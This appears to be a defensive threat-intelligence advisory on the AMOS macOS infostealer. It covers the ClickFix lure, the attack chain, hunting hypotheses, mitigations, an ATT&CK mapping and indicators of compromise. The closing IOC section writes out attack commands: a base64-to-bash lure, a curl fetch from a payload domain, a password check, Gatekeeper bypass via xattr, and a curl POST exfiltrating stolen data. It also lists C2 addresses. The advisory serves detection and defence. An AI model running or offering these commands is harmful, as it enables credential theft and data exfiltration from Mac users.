Why AMOS matters: The macOS malware stealing data at scale

What Happened

A prominent piece of malicious software called AMOS is targeting Mac users to steal their sensitive information. The attack starts when a user is tricked into copying and pasting a malicious command into their Mac's Terminal application, often through a fake error message (a technique called ClickFix). Once running, the malware steals passwords, browser data, and cryptocurrency wallet information, sending it back to the attackers. Mac users should be extremely cautious about pasting unknown commands into the Terminal and should ensure their system software is up to date.

Key Takeaways

• AMOS is a prominent macOS infostealer distributed via Malware-as-a-Service (MaaS), accounting for nearly 40% of Sophos's macOS protection updates in early 2025.
• The malware heavily relies on 'ClickFix' social engineering, tricking users into executing malicious Terminal commands to initiate the infection.
• It employs a multi-stage attack chain that captures the user's macOS password via a fake prompt to execute privileged actions and bypass Gatekeeper.
• AMOS targets high-value data including the macOS Keychain, browser credentials, and cryptocurrency wallets.
• Persistence is achieved using LaunchDaemons and hidden helper binaries dropped in the user directory.

Affected Systems

• macOS

Attack Chain

The attack begins with a ClickFix social engineering lure that tricks the victim into executing a base64-encoded bash command in the macOS Terminal. This bootstrap script downloads a secondary payload and prompts the user for their macOS password, validating it locally using the 'dscl' utility. The malware then uses the captured password to execute the stage 2 payload with elevated privileges, bypassing Gatekeeper by stripping extended attributes. After performing anti-analysis checks, it harvests sensitive data from the Keychain, browsers, and crypto wallets, archives it using 'ditto', and exfiltrates it via a 'curl' POST request before establishing persistence using a LaunchDaemon.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No
• Platforms: Sophos

Sophos provides proprietary protection signatures (e.g., OSX-CRD-PRC-STEAL-BROWSER-DATA-1, OSX-COL-PRC-SUSP-DITTO-1) but no raw detection rules or queries are shared in the article.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions on macOS typically have excellent visibility into process execution (Terminal, bash, curl, ditto), file modifications (LaunchDaemons, /tmp staging), and network connections. Network Visibility: Medium — Network monitoring can catch the curl downloads and POST exfiltration to hardcoded IPs, though TLS encryption may obscure the payload contents. Detection Difficulty: Moderate — While the initial execution relies on user interaction, the subsequent chain of native macOS utilities (dscl, ditto, curl) executing from /tmp or hidden user directories provides strong behavioral signals.

Required Log Sources

• Process Execution Logs
• File System Activity Logs
• Network Connection Logs

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for 'dscl' authentication attempts followed immediately by the creation of hidden files (e.g., '.pass') in user directories.	Process Execution, File Creation	Credential Access	Low
Hunt for the 'ditto' command being used to compress directories located in '/tmp', especially when followed by 'curl' POST requests.	Process Execution, Network	Collection	Low
Search for the removal of extended attributes ('xattr -c') on files located in '/tmp' using 'sudo'.	Process Execution	Defense Evasion	Low
Monitor for the creation of new '.plist' files in '/Library/LaunchDaemons/' that reference hidden binaries (dot-prefixed) in user home directories.	File Creation	Persistence	Low

Control Gaps

• Lack of Gatekeeper enforcement for Terminal-executed scripts
• Over-privileged standard users

Key Behavioral Indicators

• Terminal.app spawning bash and curl
• dscl . -authonly execution
• sudo xattr -c on /tmp files
• ditto archiving /tmp directories
• curl POST requests with file uploads from /tmp

False Positive Assessment

• Low. The combination of 'dscl' for password validation, 'xattr' stripping in '/tmp', and 'ditto' archiving followed by 'curl' exfiltration is highly specific to malicious activity and rarely seen in legitimate administrative tasks.

Recommendations

Immediate Mitigation

• Verify against your organization's incident response runbook and team escalation paths before acting.
• Consider searching endpoint telemetry for the identified C2 IP addresses (38.244.158.56, 45.94.47.204) and domains (sphereou.com, sassonco.com).
• Evaluate whether any macOS endpoints have recently created hidden files like '.pass', '.agent', or '.mainhelper' in user directories.

Infrastructure Hardening

• Consider enforcing Gatekeeper and notarization requirements, disallowing 'Anywhere' execution settings.
• Evaluate removing local admin rights by default to prevent unauthorized privileged elevation.
• Ensure XProtect and macOS system security updates are enabled and fully up to date.

User Protection

• If supported by your EDR, consider blocking the execution of unsigned or untrusted binaries from hidden paths (dot-prefixed) in user home directories.
• Evaluate restricting the installation of unapproved cryptocurrency wallet applications on corporate devices.

Security Awareness

• Consider training users on the risks of 'ClickFix' social engineering, specifically warning against pasting unknown commands into the macOS Terminal.

MITRE ATT&CK Mapping

• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1056.002 - Input Capture: GUI Input Capture
• T1106 - Native API
• T1082 - System Information Discovery
• T1555.001 - Credentials from Password Stores: Keychain
• T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
• T1560.001 - Archive Collected Data: Archive via Utility
• T1041 - Exfiltration Over C2 Channel
• T1543.004 - Create or Modify System Process: Launch Daemon

Additional IOCs

• Ips:
  • 38[.]244[.]158[.]56 - Exfiltration IP address
  • 45[.]94[.]47[.]204 - Command and Control (C2) IP address
• Domains:
  • sphereou[.]com - Payload delivery domain
• File Paths:
  • /tmp/update - Stage 2 payload staging path
  • /tmp/91897/ - Data staging and collection directory
  • /tmp/out.zip - Archive containing exfiltrated data
  • /Library/LaunchDaemons/com.finder.helper.plist - Persistence LaunchDaemon path
  • /Users/<username>/.pass - Hidden file storing the validated macOS password
  • /Users/<username>/.agent - Hidden helper binary
• Command Lines:
  • Purpose: Initial execution via ClickFix social engineering | Tools: bash, base64 | Stage: Initial Access | echo <b64> | base64 -d | bash
  • Purpose: Download bootstrap script | Tools: curl | Stage: Execution | curl -fsSL https://sphereou.com/cleanera
  • Purpose: Local password validation | Tools: dscl | Stage: Credential Access | dscl . -authonly "$username" "$password"
  • Purpose: Remove extended attributes to bypass Gatekeeper | Tools: sudo, xattr | Stage: Defense Evasion | sudo -S xattr -c /tmp/update
  • Purpose: Archive stolen data for exfiltration | Tools: ditto | Stage: Collection | ditto -c -k --sequesterRsrc /tmp/91897/ /tmp/out.zip
  • Purpose: Exfiltrate archived data to C2 | Tools: curl | Stage: Exfiltration | curl -X POST -F "file=@/tmp/out.zip"